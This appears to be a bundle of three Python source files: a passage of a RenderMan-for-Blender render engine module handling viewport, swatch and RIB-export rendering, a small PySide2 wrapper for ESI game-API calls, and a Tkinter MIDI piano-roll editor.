rman.Dspy.EnableDspyServer()
if not self._check_prman_license():
return False
time_start = time.time()
config = rman.Types.RtParamList()
render_config = rman.Types.RtParamList()
rendervariant = scene_utils.get_render_variant(self.bl_scene)
scene_utils.set_render_variant_config(self.bl_scene, config, render_config)
self.rman_is_xpu = (rendervariant == 'xpu')
self.sg_scene = self.sgmngr.CreateScene(config, render_config, self.stats_mgr.rman_stats_session)
try:
self.rman_scene_sync.sg_scene = self.sg_scene
rfb_log().info("Parsing scene...")
self.rman_is_exporting = True
self.start_export_stats_thread()
self.rman_scene.export_for_interactive_render(context, depsgraph, self.sg_scene)
self.rman_is_exporting = False
self._dump_rib_(self.bl_scene.frame_current)
rfb_log().info("Finished parsing scene. Total time: %s" % string_utils._format_time_(time.time() - time_start))
self.rman_is_live_rendering = True
render_cmd = "prman -live"
render_cmd = self._append_render_cmd(render_cmd)
self.sg_scene.Render(render_cmd)
self.start_stats_thread()
rfb_log().info("RenderMan Viewport Render Started.")
if render_into_org != '':
rm.render_ipr_into = render_into_org
if not self.rman_is_xpu:
# for now, we only set the redraw callback for RIS
self.set_redraw_func()
# start a thread to periodically call engine.tag_redraw()
__DRAW_THREAD__ = threading.Thread(target=draw_threading_func, args=(self, ))
__DRAW_THREAD__.start()
return True
except Exception as e:
bpy.ops.renderman.printer('INVOKE_DEFAULT', level="ERROR", message='Export failed: %s' % str(e))
rfb_log().error('Export Failed:\n%s' % traceback.format_exc())
self.stop_render(stop_draw_thread=False)
self.del_bl_engine()
return False
def start_swatch_render(self, depsgraph):
self.reset()
self.bl_scene = depsgraph.scene_eval
rfb_log().debug("Parsing scene...")
time_start = time.time()
self.rman_callbacks.clear()
ec = rman.EventCallbacks.Get()
rman.Dspy.DisableDspyServer()
ec.RegisterCallback("Progress", progress_cb, self)
self.rman_callbacks["Progress"] = progress_cb
ec.RegisterCallback("Render", render_cb, self)
self.rman_callbacks["Render"] = render_cb
config = rman.Types.RtParamList()
render_config = rman.Types.RtParamList()
self.sg_scene = self.sgmngr.CreateScene(config, render_config, self.stats_mgr.rman_stats_session)
self.rman_is_exporting = True
self.rman_scene.export_for_swatch_render(depsgraph, self.sg_scene)
self.rman_is_exporting = False
self.rman_running = True
self.rman_swatch_render_running = True
self._dump_rib_()
rfb_log().debug("Finished parsing scene. Total time: %s" % string_utils._format_time_(time.time() - time_start))
if not self._check_prman_license():
return False
self.rman_is_live_rendering = True
self.sg_scene.Render("prman")
render = self.rman_scene.bl_scene.render
render_view = self.bl_engine.active_view_get()
image_scale = render.resolution_percentage / 100.0
width = int(render.resolution_x * image_scale)
height = int(render.resolution_y * image_scale)
result = self.bl_engine.begin_result(0, 0,
width,
height,
view=render_view)
layer = result.layers[0].passes.find_by_name("Combined", render_view)
while not self.bl_engine.test_break() and self.rman_is_live_rendering:
time.sleep(0.001)
if layer:
buffer = self._get_buffer(width, height, image_num=0, as_flat=False)
if buffer:
layer.rect = buffer
self.bl_engine.update_result(result)
# try to get the buffer one last time before exiting
if layer:
buffer = self._get_buffer(width, height, image_num=0, as_flat=False)
if buffer:
layer.rect = buffer
self.bl_engine.update_result(result)
self.stop_render()
self.bl_engine.end_result(result)
self.del_bl_engine()
return True
def start_export_rib_selected(self, context, rib_path, export_materials=True, export_all_frames=False):
self.rman_running = True
bl_scene = context.scene
if export_all_frames:
original_frame = bl_scene.frame_current
rfb_log().debug("Writing to RIB...")
for frame in range(bl_scene.frame_start, bl_scene.frame_end + 1):
bl_scene.frame_set(frame, subframe=0.0)
config = rman.Types.RtParamList()
render_config = rman.Types.RtParamList()
self.sg_scene = self.sgmngr.CreateScene(config, render_config, self.stats_mgr.rman_stats_session)
try:
self.rman_is_exporting = True
self.rman_scene.export_for_rib_selection(context, self.sg_scene)
self.rman_is_exporting = False
rib_output = string_utils.expand_string(rib_path,
frame=frame,
asFilePath=True)
self.sg_scene.Render("rib " + rib_output + " -archive")
except Exception as e:
self.bl_engine.report({'ERROR'}, 'Export failed: %s' % str(e))
self.stop_render(stop_draw_thread=False)
self.del_bl_engine()
return False
self.sgmngr.DeleteScene(self.sg_scene)
bl_scene.frame_set(original_frame, subframe=0.0)
else:
config = rman.Types.RtParamList()
render_config = rman.Types.RtParamList()
self.sg_scene = self.sgmngr.CreateScene(config, render_config, self.stats_mgr.rman_stats_session)
try:
self.rman_is_exporting = True
self.rman_scene.export_for_rib_selection(context, self.sg_scene)
self.rman_is_exporting = False
rib_output = string_utils.expand_string(rib_path,
frame=bl_scene.frame_current,
asFilePath=True)
self.sg_scene.Render("rib " + rib_output + " -archive")
except Exception as e:
self.bl_engine.report({'ERROR'}, 'Export failed: %s' % str(e))
rfb_log().error('Export Failed:\n%s' % traceback.format_exc())
self.stop_render(stop_draw_thread=False)
self.del_bl_engine()
return False
self.sgmngr.DeleteScene(self.sg_scene)
self.sg_scene = None
self.rman_running = False
return True
def stop_render(self, stop_draw_thread=True):
global __DRAW_THREAD__
global __RMAN_STATS_THREAD__
is_main_thread = (threading.current_thread() == threading.main_thread())
if is_main_thread:
rfb_log().debug("Trying to acquire stop_render_mtx")
if not self.stop_render_mtx.acquire(timeout=5.0):
return
if not self.rman_interactive_running and not self.rman_running:
return
self.rman_running = False
self.rman_interactive_running = False
self.rman_swatch_render_running = False
self.rman_is_viewport_rendering = False
self.rman_is_exporting = False
# Remove callbacks
ec = rman.EventCallbacks.Get()
if is_main_thread:
rfb_log().debug("Unregister any callbacks")
for k,v in self.rman_callbacks.items():
ec.UnregisterCallback(k, v, self)
self.rman_callbacks.clear()
self.rman_is_live_rendering = False
# wait for the drawing thread to finish
# if we are told to.
if stop_draw_thread and __DRAW_THREAD__:
__DRAW_THREAD__.join()
__DRAW_THREAD__ = None
# stop retrieving stats
if __RMAN_STATS_THREAD__:
__RMAN_STATS_THREAD__.join()
__RMAN_STATS_THREAD__ = None
if is_main_thread:
rfb_log().debug("Telling SceneGraph to stop.")
if self.sg_scene:
self.sg_scene.Stop()
if is_main_thread:
rfb_log().debug("Delete Scenegraph scene")
self.sgmngr.DeleteScene(self.sg_scene)
self.sg_scene = None
#self.stats_mgr.reset()
self.rman_scene.reset()
self.viewport_buckets.clear()
self._draw_viewport_buckets = False
__update_areas__()
self.stop_render_mtx.release()
if is_main_thread:
rfb_log().debug("RenderMan has Stopped.")
def get_blender_dspy_plugin(self):
global __BLENDER_DSPY_PLUGIN__
        if __BLENDER_DSPY_PLUGIN__ is None:
# grab a pointer to the Blender display driver
ext = '.so'
if sys.platform == ("win32"):
ext = '.dll'
__BLENDER_DSPY_PLUGIN__ = ctypes.CDLL(os.path.join(envconfig().rmantree, 'lib', 'plugins', 'd_blender%s' % ext))
return __BLENDER_DSPY_PLUGIN__
def set_redraw_func(self):
# pass our callback function to the display driver
dspy_plugin = self.get_blender_dspy_plugin()
dspy_plugin.SetRedrawCallback(__CALLBACK_FUNC__)
def has_buffer_updated(self):
dspy_plugin = self.get_blender_dspy_plugin()
return dspy_plugin.HasBufferUpdated()
def reset_buffer_updated(self):
dspy_plugin = self.get_blender_dspy_plugin()
dspy_plugin.ResetBufferUpdated()
def draw_pixels(self, width, height):
self.viewport_res_x = width
self.viewport_res_y = height
if self.rman_is_viewport_rendering:
dspy_plugin = self.get_blender_dspy_plugin()
# (the driver will handle pixel scaling to the given viewport size)
dspy_plugin.DrawBufferToBlender(ctypes.c_int(width), ctypes.c_int(height))
if self.do_draw_buckets():
# draw bucket indicator
image_num = 0
arXMin = ctypes.c_int(0)
arXMax = ctypes.c_int(0)
arYMin = ctypes.c_int(0)
arYMax = ctypes.c_int(0)
dspy_plugin.GetActiveRegion(ctypes.c_size_t(image_num), ctypes.byref(arXMin), ctypes.byref(arXMax), ctypes.byref(arYMin), ctypes.byref(arYMax))
if ( (arXMin.value + arXMax.value + arYMin.value + arYMax.value) > 0):
yMin = height-1 - arYMin.value
yMax = height-1 - arYMax.value
xMin = arXMin.value
xMax = arXMax.value
if self.rman_scene.viewport_render_res_mult != 1.0:
# render resolution multiplier is set, we need to re-scale the bucket markers
scaled_width = width * self.rman_scene.viewport_render_res_mult
xMin = int(width * ((arXMin.value) / (scaled_width)))
xMax = int(width * ((arXMax.value) / (scaled_width)))
scaled_height = height * self.rman_scene.viewport_render_res_mult
yMin = height-1 - int(height * ((arYMin.value) / (scaled_height)))
yMax = height-1 - int(height * ((arYMax.value) / (scaled_height)))
vertices = []
c1 = (xMin, yMin)
c2 = (xMax, yMin)
c3 = (xMax, yMax)
c4 = (xMin, yMax)
vertices.append(c1)
vertices.append(c2)
vertices.append(c3)
vertices.append(c4)
indices = [(0, 1), (1, 2), (2,3), (3, 0)]
                    # we've reached our max buckets, pop the oldest one off the list
if len(self.viewport_buckets) > RFB_VIEWPORT_MAX_BUCKETS:
self.viewport_buckets.pop()
self.viewport_buckets.insert(0,[vertices, indices])
bucket_color = get_pref('rman_viewport_bucket_color', default=RMAN_RENDERMAN_BLUE)
# draw from newest to oldest
for v, i in (self.viewport_buckets):
shader = gpu.shader.from_builtin('2D_UNIFORM_COLOR')
shader.uniform_float("color", bucket_color)
batch = batch_for_shader(shader, 'LINES', {"pos": v}, indices=i)
shader.bind()
batch.draw(shader)
# draw progress bar at the bottom of the viewport
if self.do_draw_progressbar():
progress = self.stats_mgr._progress / 100.0
progress_color = get_pref('rman_viewport_progress_color', default=RMAN_RENDERMAN_BLUE)
shader = gpu.shader.from_builtin('2D_UNIFORM_COLOR')
shader.uniform_float("color", progress_color)
vtx = [(0, 1), (width * progress, 1)]
batch = batch_for_shader(shader, 'LINES', {"pos": vtx})
shader.bind()
batch.draw(shader)
def get_numchannels(self, image_num):
dspy_plugin = self.get_blender_dspy_plugin()
num_channels = dspy_plugin.GetNumberOfChannels(ctypes.c_size_t(image_num))
return num_channels
def _get_buffer(self, width, height, image_num=0, num_channels=-1, back_fill=True, as_flat=True, render=None):
dspy_plugin = self.get_blender_dspy_plugin()
if num_channels == -1:
num_channels = self.get_numchannels(image_num)
if num_channels > 4 or num_channels < 0:
rfb_log().debug("Could not get buffer. Incorrect number of channels: %d" % num_channels)
return None
ArrayType = ctypes.c_float * (width * height * num_channels)
f = dspy_plugin.GetFloatFramebuffer
f.restype = ctypes.POINTER(ArrayType)
try:
buffer = numpy.array(f(ctypes.c_size_t(image_num)).contents)
pixels = list()
# we need to flip the image
# also, Blender is expecting a 4 channel image
if as_flat:
if num_channels == 4:
return buffer.tolist()
else:
for y in range(0, height):
i = (width * y * num_channels)
for x in range(0, width):
j = i + (num_channels * x)
if num_channels == 3:
pixels.append(buffer[j])
pixels.append(buffer[j+1])
pixels.append(buffer[j+2])
pixels.append(1.0)
elif num_channels == 2:
pixels.append(buffer[j])
pixels.append(buffer[j+1])
pixels.append(1.0)
pixels.append(1.0)
elif num_channels == 1:
pixels.append(buffer[j])
pixels.append(buffer[j])
pixels.append(buffer[j])
pixels.append(1.0)
return pixels
else:
if render and render.use_border:
start_x = 0
end_x = width
start_y = 0
end_y = height
if render.border_min_y > 0.0:
start_y = int(height * (render.border_min_y))-1
if render.border_max_y > 0.0:
end_y = int(height * (render.border_max_y))-1
if render.border_min_x > 0.0:
start_x = int(width * render.border_min_x)-1
if render.border_max_x < 1.0:
end_x = int(width * render.border_max_x)-2
# return the buffer as a list of lists
for y in range(start_y, end_y):
i = (width * y * num_channels)
for x in range(start_x, end_x):
j = i + (num_channels * x)
if not back_fill:
pixels.append(buffer[j:j+num_channels])
continue
if num_channels == 4:
pixels.append(buffer[j:j+4])
continue
pixel = [1.0] * num_channels
pixel[0] = buffer[j]
if num_channels == 3:
pixel[1] = buffer[j+1]
pixel[2] = buffer[j+2]
elif num_channels == 2:
pixel[1] = buffer[j+1]
                            # num_channels == 1: pixel[0] already holds the only
                            # channel value, so there is nothing left to back-fill.
pixels.append(pixel)
return pixels
else:
buffer = numpy.reshape(buffer, (-1, num_channels))
return buffer.tolist()
except Exception as e:
rfb_log().debug("Could not get buffer: %s" % str(e))
return None
def save_viewport_snapshot(self, frame=1):
if not self.rman_is_viewport_rendering:
return
res_mult = self.rman_scene.viewport_render_res_mult
width = int(self.viewport_res_x * res_mult)
height = int(self.viewport_res_y * res_mult)
pixels = self._get_buffer(width, height)
if not pixels:
rfb_log().error("Could not save snapshot.")
return
nm = 'rman_viewport_snapshot_<F4>_%d' % len(bpy.data.images)
nm = string_utils.expand_string(nm, frame=frame)
img = bpy.data.images.new(nm, width, height, float_buffer=True, alpha=True)
img.pixels = pixels
img.update()
def update_scene(self, context, depsgraph):
if self.rman_interactive_running:
self.rman_scene_sync.update_scene(context, depsgraph)
def update_view(self, context, depsgraph):
if self.rman_interactive_running:
self.rman_scene_sync.update_view(context, depsgraph)
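# --- Illustrative sketch (editor's addition, not part of the original module) ---
# _get_buffer() above reads pixels from the d_blender display driver by giving
# the ctypes call a restype of "pointer to a fixed-size float array" and then
# wrapping .contents with numpy. The standalone helper below reproduces that
# pattern against a buffer allocated in Python, so it runs without the display
# driver; the function name and its arguments are hypothetical.
def _example_read_float_buffer(ptr, width, height, num_channels):
    import ctypes
    import numpy
    # Reinterpret the raw float pointer as one flat array of
    # width * height * num_channels floats, copy it into numpy and
    # reshape it to one row per pixel.
    ArrayType = ctypes.c_float * (width * height * num_channels)
    array_ptr = ctypes.cast(ptr, ctypes.POINTER(ArrayType))
    return numpy.array(array_ptr.contents).reshape(-1, num_channels)
# Example (hypothetical data): a 2x2 RGBA buffer filled with 0.5.
#   raw = (ctypes.c_float * 16)(*([0.5] * 16))
#   _example_read_float_buffer(raw, 2, 2, 4).shape   # -> (4, 4)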
|
esi_processor.py
|
# esi_processor.py
import threading
from PySide2 import QtCore
from .esi.esi import ESI
class ESIProcessor(QtCore.QObject):
"""
ESI Middleware
"""
login_response = QtCore.Signal(str)
logout_response = QtCore.Signal()
location_response = QtCore.Signal(str)
destination_response = QtCore.Signal(bool)
def __init__(self, parent=None):
super().__init__(parent)
self.esi = ESI(self._login_callback, self._logout_callback)
def login(self):
return self.esi.start_server()
def logout(self):
self.esi.logout()
def get_location(self):
server_thread = threading.Thread(target=self._get_location)
        server_thread.daemon = True
server_thread.start()
def _get_location(self):
location = self.esi.get_char_location()
self.location_response.emit(location)
# TODO properly type this
def set_destination(self, sys_id):
server_thread = threading.Thread(target=self._set_destination, args=(sys_id, ))
        server_thread.daemon = True
server_thread.start()
# TODO properly type this
def _set_destination(self, sys_id):
response = self.esi.set_char_destination(sys_id)
self.destination_response.emit(response)
# TODO properly type this
def _login_callback(self, char_name):
self.login_response.emit(char_name)
def _logout_callback(self):
self.logout_response.emit()
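# --- Illustrative sketch (editor's addition, not part of the original module) ---
# ESIProcessor runs its blocking ESI calls on daemon threads and reports the
# results back through Qt signals; emitting a signal from a worker thread is
# safe because Qt queues the call onto the thread that owns the receiver.
# The demo function below shows that pattern with a dummy worker and receiver;
# every name in it is hypothetical and independent of the real ESI client.
def _demo_signal_threading():
    class _DemoWorker(QtCore.QObject):
        finished = QtCore.Signal(str)
        def start(self):
            # Emit from a background thread; delivery to the receiver below
            # is queued onto the thread that owns it (the caller's thread).
            threading.Thread(target=lambda: self.finished.emit('done'),
                             daemon=True).start()
    class _DemoReceiver(QtCore.QObject):
        @QtCore.Slot(str)
        def on_finished(self, msg):
            print('worker says:', msg)
            QtCore.QCoreApplication.instance().quit()
    app = QtCore.QCoreApplication.instance() or QtCore.QCoreApplication([])
    worker = _DemoWorker()
    receiver = _DemoReceiver()
    worker.finished.connect(receiver.on_finished)
    worker.start()
    app.exec_()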
|
midiedit.py
|
from abc import abstractmethod, ABC
from enum import Enum
import os
from queue import Queue
import select
import time
from alsa_midi import SND_SEQ_OPEN_OUTPUT, SND_SEQ_OPEN_INPUT
from amidi import PortInfo, Sequencer
from midi import AllSoundOff, ControlChange, Event as MIDIEvent, NoteOn, \
NoteOff, Piece, PitchWheel, ProgramChange, SetTempo, Track, TrackCursor
from midifile import Reader as MidiFileReader, Writer as MidiFileWriter
from threading import Thread
from typing import Any, Callable, Dict, List, Optional, Tuple, Union
from tkinter import Canvas, Event, Frame, Label, Scrollbar, Tk, Toplevel, \
PhotoImage, BOTH, HORIZONTAL, VERTICAL, NSEW
ROW_HEIGHT = 10
## Width of the key panel on the left hand side.
KEYS_WIDTH = 40
DEFAULT_NOTE_WIDTH = 40
NOTE_FILL_COLOR = '#00ff00'
POS_MARKER_COLOR = '#ff0000'
NOTE_COLORS = [0, 1, 0, 1, 0, 0, 1, 0, 1, 0, 1, 0]
GRID_LINE_COLOR = '#000044'
# The outline color of notes.
SELECT_OUTLINE = 'white'
NORMAL_OUTLINE = 'black'
class DragMode(Enum):
NONE = 0 # Not dragging.
MOVE = 1 # Move a note to a different note or position
EXTEND = 2 # Make the note longer or shorter or start earlier/later
class AudioIFace(ABC):
@abstractmethod
def begin_note_edit(self, note: int, velocity: int) -> None:
"""To be called the first time a note is moved.
"""
@abstractmethod
def next_note_edit(self, note: int, velocity: int) -> None:
"""To be called on a subsequent note move.
It is the responsibility of this interface to do nothing if 'note' has
not changed since the last time.
"""
@abstractmethod
def end_note_edit(self) -> None:
"""To be called when a note edit has ended."""
@abstractmethod
def play(self, track: Track):
"""Begin playing."""
@abstractmethod
def set_play_callback(self, func: Callable[[int], None]) -> None:
"""Set the callback used to inform the UI of position changes.
'func' should be callable from any thread, not necessarily just the UI
thread. It is passed the current play position (in ticks).
"""
@abstractmethod
def set_event_recorder(self, func: Callable[[MIDIEvent], None]) -> None:
"""Set a function to be called when a new event comes in during play.
"""
@abstractmethod
def set_pos(self, pos: int) -> None:
"""Set the current play position (in ticks)."""
@abstractmethod
def get_pos(self) -> int:
"""Return the current play position (in ticks)."""
@abstractmethod
def stop(self):
"""Stop playing."""
@abstractmethod
def isPlaying(self) -> bool:
"""Returns true if the interface is currently playing."""
@property
def playing(self) -> bool:
"""Returns true if the interface is currently playing.
This is just the property form of isPlaying().
"""
return self.isPlaying()
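# --- Illustrative sketch (editor's addition, not part of the original module) ---
# A do-nothing implementation of the AudioIFace contract above. Something like
# this is handy for exercising the editor UI without an ALSA sequencer, e.g. as
# the 'audio' argument of MidiEditor below; the class name is hypothetical and
# nothing in this module uses it.
class NullAudioIFace(AudioIFace):
    def __init__(self) -> None:
        self.__pos = 0
        self.__playing = False
        self.__callback : Optional[Callable[[int], None]] = None
        self.__recorder : Optional[Callable[[MIDIEvent], None]] = None
    def begin_note_edit(self, note: int, velocity: int) -> None:
        pass
    def next_note_edit(self, note: int, velocity: int) -> None:
        pass
    def end_note_edit(self) -> None:
        pass
    def play(self, track: Track) -> None:
        self.__playing = True
    def set_play_callback(self, func: Callable[[int], None]) -> None:
        self.__callback = func
    def set_event_recorder(self, func: Callable[[MIDIEvent], None]) -> None:
        self.__recorder = func
    def set_pos(self, pos: int) -> None:
        self.__pos = pos
    def get_pos(self) -> int:
        return self.__pos
    def stop(self) -> None:
        self.__playing = False
    def isPlaying(self) -> bool:
        return self.__playing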
class MidiEditor(Frame):
def __init__(self, toplevel: Union[Tk, Toplevel, None] = None,
track: Optional[Track] = None,
audio: Optional[AudioIFace] = None
):
super(MidiEditor, self).__init__(toplevel)
self.__track = Track('track') if track is None else track
self.__canvas = Canvas(self, background='#000011')
self.__canvas.grid(row=0, column=1, sticky=NSEW)
self.__canvas.focus_set()
self.pack(expand=True, fill=BOTH)
self.__draw_canvas()
hsb = Scrollbar(self, orient=HORIZONTAL, command=self.__canvas.xview)
hsb.grid(row=1, column=1, sticky=NSEW)
vsb = Scrollbar(self, orient=VERTICAL, command=self.__canvas.yview)
vsb.grid(row=0, column=2, sticky=NSEW)
self.__canvas.config(xscrollcommand=hsb.set, yscrollcommand=vsb.set)
# Set up the queue. This is to allow background threads to post
# changes to the Tk thread.
self.__queue : 'Queue[Callable[[], Any]]' = Queue()
# A mapping from the ids of the widgets that represent notes to the
# list of note events that comprise them.
# At present, there will usually be exactly two events in this list.
# However, if support for aftertouch events are added, they will
# likely be included in this list, too.
        self.__note_map : Dict[int, List[MIDIEvent]] = {}
self.__key_canvas = Canvas(self, width=KEYS_WIDTH)
self.__key_canvas.grid(row=0, column=0, sticky=NSEW)
for i in range(0, 128):
y = (127 - i) * ROW_HEIGHT
color = '#000000' if NOTE_COLORS[i % 12] else '#ffffff'
self.__key_canvas.create_rectangle(0, y, KEYS_WIDTH, y + ROW_HEIGHT,
fill=color,
outline='#000044')
self.columnconfigure(1, weight=1)
self.rowconfigure(0, weight=1)
# Drag parameters.
# Offset from the note position to the mouse position at the start of
# the drag.
self.__drag_offset : Optional[Tuple[int, int]] = None
# X position at the start of the drag.
self.__drag_org_x : int = 0
# Current drag mode.
self.__drag_mode : DragMode = DragMode.NONE
# "Pulses per beat" (usually "Pulses per quarter note.")
self.__ppb : int = self.__track.ppqn
# The current default note length, channel and velocity for new notes.
self.__note_len : int = self.__ppb
self.__channel : int = 0
self.__velocity : int = 127
# The desired width of a beat ("quarter note") in screen pixels.
self.__beat_width : float = 40.0
# Time signature, expressed as beats per measure.
self.__sig : int = 4
# The number of midi clock ticks ("pulses") per x axis unit on the
# screen.
self.__ticks_per_x_unit : float = self.__ppb / self.__beat_width
self.__audio = audio
# Key bindings. We have to bind these to the toplevel, the frame
# won't intercept them.
toplevel.bind('<space>', self.__toggle_play)
toplevel.bind('<Left>', self.__left_note)
toplevel.bind('<Right>', self.__right_note)
# Render the note and measure lines.
measure = self.__ppb * self.__sig
note = self.__ppb
end_time = track[-1].time if track else (measure * 20)
t = note
while t < end_time + measure:
x = self.__x_from_time(t)
self.__canvas.create_line(x, 0, x, 128 * ROW_HEIGHT,
fill=GRID_LINE_COLOR,
dash=(3, 3) if t % measure else None
)
t += note
self.__canvas.config(scrollregion=(0, 0, self.__x_from_time(end_time),
128 * ROW_HEIGHT
)
)
self.__canvas.bind('<Delete>', self.__delete_selected)
# Render the position line.
if audio:
self.__play_callback(0)
audio.set_play_callback(self.__play_callback)
audio.set_event_recorder(self.get_event_recorder())
        # Start the position marker at time zero; __draw_pos() moves it later.
        self.__pos_marker = self.__canvas.create_line(0, 0, 0,
128 * ROW_HEIGHT,
fill=POS_MARKER_COLOR
)
# Render the notes in the initial track.
active = {}
        for note in self.__track:
if isinstance(note, NoteOn):
active[note.note] = note
elif isinstance(note, NoteOff):
try:
start = active.pop(note.note)
id = self.__draw_new_note(start.note, start.time,
note.time)
self.__note_map[id] = [start, note]
except KeyError:
print('Unmatched end note: %s' % note.note)
self.after(100, self.__process_queue)
# Position Navigation functions
def __left_note(self, event: Event):
"""Move the play-head one beat left (back in time)."""
pos = self.__audio.get_pos()
if not pos:
# Do nothing if we're already at zero.
return
if pos % self.__ppb:
# between two notes, quantify to the previous one.
pos = pos // self.__ppb * self.__ppb
else:
pos = (pos // self.__ppb - 1) * self.__ppb
self.__audio.set_pos(pos)
def __right_note(self, event: Event):
"""Move the play-head one beat right (forward in time)."""
self.__audio.set_pos(
(self.__audio.get_pos() // self.__ppb + 1) * self.__ppb
)
def __process_queue(self) -> None:
"""Process all events on the queue.
Then schedule the next queue processing interval.
"""
while not self.__queue.empty():
self.__queue.get()()
self.after(100, self.__process_queue)
def __draw_pos(self, pos: int) -> None:
x = pos / self.__ticks_per_x_unit
self.__canvas.coords(self.__pos_marker, x, 0, x, 128 * ROW_HEIGHT)
def __play_callback(self, pos: int) -> None:
# queue a draw_pos call.
self.__queue.put(lambda: self.__draw_pos(pos))
def __save_track(self, event: Event):
"""Saves the track. REMOVE THIS"""
print('that is all')
piece = Piece()
piece.addTrack(self.__track)
MidiFileWriter(open('unnamed.mid', 'wb')).writePiece(piece)
def __note_from_y(self, y: int) -> int:
return int(127 - y // ROW_HEIGHT)
def __y_from_note(self, note: int) -> float:
return -(note - 127) * ROW_HEIGHT
def __time_from_x(self, x: int) -> int:
"""Returns the time for a given x coordinate.
Time is measured in ticks since the beginning of the track.
"""
return int(x * self.__ticks_per_x_unit)
def __x_from_time(self, t: int) -> int:
return int(t / self.__ticks_per_x_unit)
def __select_single(self, id: int) -> None:
"""Select a single note, unselect current selections."""
self.__canvas.itemconfigure('selected', outline=NORMAL_OUTLINE)
self.__canvas.dtag('selected', 'selected')
self.__canvas.itemconfigure(id, tags=['selected'],
outline=SELECT_OUTLINE)
def __toggle_select(self, id: int) -> None:
"""Toggle the selection status of a given element."""
tags = self.__canvas.gettags(id)
if 'selected' in tags:
self.__canvas.dtag(id, 'selected')
self.__canvas.itemconfigure(id, outline=NORMAL_OUTLINE)
else:
self.__canvas.itemconfigure(id, tags=['selected'],
outline=SELECT_OUTLINE)
def __delete_selected(self, event: Event):
"""Delete all selected notes."""
for item in self.__canvas.find_withtag('selected'):
for midi_event in self.__note_map[item]:
self.__track.remove(midi_event)
del self.__note_map[item]
self.__canvas.delete(item)
def __get_x(self, event: Event) -> int:
"""Returns the x coordinate for an event's screen y coordinate."""
return int(self.__canvas.canvasx(event.x))
def __get_y(self, event: Event) -> int:
"""Returns the y coordinate for an event's screen y coordinate."""
return int(self.__canvas.canvasy(event.y))
def __end_drag(self, id: int, event: Event) -> Optional[str]:
self.__canvas.tag_unbind(id, '<Motion>')
self.__canvas.tag_unbind(id, '<ButtonRelease-1>')
self.__audio.end_note_edit()
if self.__drag_mode == DragMode.MOVE:
# Move the original events to the new time and note.
note = self.__note_from_y(self.__get_y(event))
t = self.__time_from_x(self.__get_x(event) - self.__drag_offset[0])
events = self.__note_map[id]
start_time = events[0].time
for event in events:
if isinstance(event, (NoteOn, NoteOff)):
event.note = note
if t != start_time:
event.time = t + event.time - start_time
self.__track.reposition(event)
elif self.__drag_mode == DragMode.EXTEND:
length = self.__get_x(event) - self.__drag_org_x
events = self.__note_map[id]
events[1].time += self.__time_from_x(length)
self.__track.reposition(events[1])
self.__drag_mode = DragMode.NONE
self.__drag_offset = None
self.__drag_org_x = 0
def __drag(self, id: int, event: Event) -> Optional[str]:
if self.__drag_mode == DragMode.MOVE:
note = self.__note_from_y(self.__get_y(event))
y = (127 - note) * ROW_HEIGHT
x = self.__get_x(event) - self.__drag_offset[0]
x1, _, x2, _ = self.__canvas.coords(id)
self.__canvas.coords(id, x, y, x + x2 - x1, y + ROW_HEIGHT)
self.__audio.next_note_edit(note, velocity=127)
elif self.__drag_mode == DragMode.EXTEND:
length = self.__get_x(event) - self.__drag_org_x
x1, y1, x2, y2 = self.__canvas.coords(id)
events = self.__note_map[id]
org_len = self.__x_from_time(events[1].time - events[0].time)
if length + org_len > 0:
self.__canvas.coords(id, x1, y1, x1 + org_len + length, y2)
def __begin_drag(self, id: int, event: Event, mode: DragMode) -> None:
cx, cy, _, _ = self.__canvas.coords(id)
self.__drag_org_x = self.__get_x(event)
self.__drag_offset = (self.__get_x(event) - cx, self.__get_y(event) - cy)
self.__canvas.tag_bind(id, '<Motion>', lambda e: self.__drag(id, e))
self.__canvas.tag_bind(id, '<ButtonRelease-1>',
lambda e: self.__end_drag(id, e)
)
self.__drag_mode = mode
self.__audio.begin_note_edit(self.__note_from_y(cy), velocity=127)
def __begin_drag_note(self, id: int, event: Event) -> Optional[str]:
self.__select_single(id)
self.__begin_drag(id, event, DragMode.MOVE)
return 'break'
def __begin_duration_drag(self, id: int, event: Event) -> Optional[str]:
self.__select_single(id)
self.__begin_drag(id, event, DragMode.EXTEND)
return 'break'
def __toggle_select_handler(self, id: int, event: Event) -> None:
# We don't really have any meaningful "drag" semantics to this yet,
        # but it still has a lot of the semantics of a drag event.
self.__begin_drag(id, event, DragMode.NONE)
self.__toggle_select(id)
def __draw_new_note(self, note: int, t1: int, t2: int) -> int:
y = self.__y_from_note(note)
x1 = self.__x_from_time(t1)
x2 = self.__x_from_time(t2)
id = self.__canvas.create_rectangle(x1, y, x2, y + ROW_HEIGHT,
fill=NOTE_FILL_COLOR)
self.__canvas.tag_bind(id, '<Button-1>',
lambda e: self.__begin_drag_note(id, e)
)
self.__canvas.tag_bind(id, '<Shift-Button-1>',
lambda e: self.__begin_duration_drag(id, e)
)
self.__canvas.tag_bind(id, '<Control-Button-1>',
lambda e: self.__toggle_select_handler(id, e)
)
return id
def __add_note(self, event: Event) -> Optional[str]:
# Ignore this if we've started a drag. It seems that we still get
# this event even if the handler for the item returns 'break'.
if self.__drag_offset:
return
note = self.__note_from_y(self.__get_y(event))
t = self.__time_from_x(self.__get_x(event))
self.__audio.begin_note_edit(note, velocity=127)
note_on = NoteOn(t, self.__channel, note, self.__velocity)
note_off = NoteOff(t + self.__note_len, self.__channel, note, 0)
self.__add_note_pair(note_on, note_off)
def __add_note_pair(self, note_on: NoteOn, note_off: NoteOff) -> None:
id = self.__draw_new_note(note_on.note, note_on.time,
note_off.time)
self.__track.add(note_on)
self.__track.add(note_off)
self.__note_map[id] = [note_on, note_off]
self.__select_single(id)
def get_event_recorder(self) -> Callable[[MIDIEvent], None]:
"""Returns a function that records midi events.
The function returned can safely be called from any thread.
"""
# Keeps track of which notes from the input device have a NoteOn
# event that hasn't been closed.
note_map : Dict[int, NoteOn] = {}
def record_event(event: MIDIEvent):
# The internal record-event function, that actually stores the
# event in the track.
if isinstance(event, NoteOn):
note_map[event.note] = event
elif isinstance(event, NoteOff):
start = note_map.get(event.note)
if start:
self.__add_note_pair(start, event)
del note_map[event.note]
else:
self.__track.add(event)
def on_event(event: MIDIEvent):
# This is the returned record function that is safe to call in a
# non-ui thread.
self.__queue.put(lambda: record_event(event))
return on_event
def __end_add_note(self, event: Event) -> None:
self.__audio.end_note_edit()
def __toggle_play(self, event: Event) -> None:
if self.__audio.playing:
self.__audio.stop()
else:
self.__audio.play(self.__track)
def __draw_canvas(self) -> None:
# draw the grid.
for i in range(0, 128):
y = i * ROW_HEIGHT
#self.__canvas.winfo_width()
self.__canvas.create_line(0, y, 1000000, y, fill=GRID_LINE_COLOR)
